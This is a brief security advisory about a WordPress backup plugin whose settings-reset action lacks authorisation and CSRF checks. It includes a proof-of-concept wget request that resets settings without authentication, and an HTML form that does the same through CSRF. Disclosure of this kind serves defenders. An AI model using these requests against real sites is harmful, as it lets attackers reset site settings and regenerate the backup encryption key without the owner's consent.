The plugin does not have authorisation and CSRF checks when resetting its settings, allowing unauthenticated attackers to reset them, including generating a new backup encryption key. v4.3.5 added capability check, but CSRF one still missing.
v < 4.3.5 - wget "http://example.com/wp-admin/admin.php?action=rest-nonce" --post-data="xcloner_restore_defaults=1" -q -O-
v < 4.3.6 (via CSRF):
<form id="test" action="http://example.com/wp-admin/admin-ajax.php?action=rest-nonce" method="POST">
<input type="text" name="xcloner_restore_defaults" value="1">
<input type="submit" value="Submit"/>
</form>